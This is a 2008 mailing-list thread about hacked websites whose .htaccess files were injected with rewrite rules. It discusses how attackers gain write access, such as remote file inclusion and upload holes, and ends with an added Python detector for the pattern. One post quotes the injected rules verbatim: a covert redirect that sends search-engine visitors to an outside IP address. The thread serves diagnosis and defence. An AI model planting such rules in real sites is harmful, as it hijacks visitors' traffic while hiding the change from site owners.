Good points!

On Thu, 2008-11-20 at 14:11 -0800, SteveW wrote:
> All they need to do is get their PHP script to run on your server.
> That will allow them to write or modify files, including .htaccess.
> 
> They can do that with a Remote File Inclusion (RFI) attack. Those
> would show in your site logs.
> 
> A security hole in Drupal or other software would allow them to upload
> a script (such as for a forum message attachment, avatar, etc.), and
> then run it.
> 
> Chances are good it was done by script.
> 
> The .htaccess code provided by Anirban does prevent anyone from
> viewing your .htaccess file with their browser, but it won't prevent
> modifying the file with PHP or by FTP. On some server configurations,
> a malicious "neighbor" on your shared server could also conduct a PHP
> attack that would be able to modify your files. If a shared server got
> severely compromised, the attackers could get access to all the sites
> on it. You could check whether other sites on your server are also
> flagged/compromised.
> 
> .htaccess must have permissions of 644, same as any other file. If
> it's locked down any tighter than that, Apache itself won't be able to
> read it, which will generate errors.
> 
> Reading it isn't really the problem, anyway. They are able to write to
> it, which means there is a security hole somewhere.
> 
> 
> On Nov 20, 12:05 pm, Jesse Nicola <[EMAIL PROTECTED]> wrote:
> > Yep.
> >
> > What I want to know is how they are getting such widespread access to
> > .htaccess files, and what we can do to prevent this!
> >
> >
> >
> > UseShots wrote:
> > > Thanks Jesse,
> >
> > > Here is the code inserted into .htaccess
> > > -------------
> > > RewriteEngine On
> > > RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
> > > > RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
> > > -------------
> >
> > > > As you can see it only redirects search engine traffic. Site owners
> > > > are usually unaware of this until someone tells them.
> >
> > > Denis
> > > > http://www.UnmaskParasites.com
> > 
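
A check for the injected pattern quoted above, as an added example that is not part of the original thread: it flags any RewriteRule that redirects to an outside host only when the referer is a search engine, which is why the owner browsing the site directly never sees it. The function name, the `own_hosts` parameter and the sample text (using the documentation address 192.0.2.10) are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Search-engine names taken from the injected rules quoted in the thread.
ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+.*?(https?://[^\s\[]+)", re.I)

# Constructed sample: one legitimate canonical-host redirect, one injected block.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=ix [R,L]
"""


def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target_host, engines) for each RewriteRule that sends
    visitors arriving from a search engine to a host not in own_hosts."""
    findings, engines = [], []
    own = {h.lower() for h in own_hosts}
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            engines += [e for e in ENGINES if e in cond.group(1).lower()]
            continue
        if re.match(r"^\s*RewriteCond\b", line, re.I):
            continue  # non-referer conditions still belong to the same rule
        rule = RULE_RE.match(line)
        if rule and engines:
            host = (urlsplit(rule.group(1)).hostname or "").lower()
            if host not in own:
                findings.append((no, host, sorted(set(engines))))
        # RewriteCond lines apply only to the RewriteRule that follows them.
        engines = []
    return findings


if __name__ == "__main__":
    for line_no, host, engines in find_referer_redirects(SAMPLE, ["www.example.org"]):
        print(f"line {line_no}: search-engine visitors redirected to {host} {engines}")
```

Run it over every .htaccess under the document root, and compare the file's modification time with the site logs to narrow down how the write happened.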

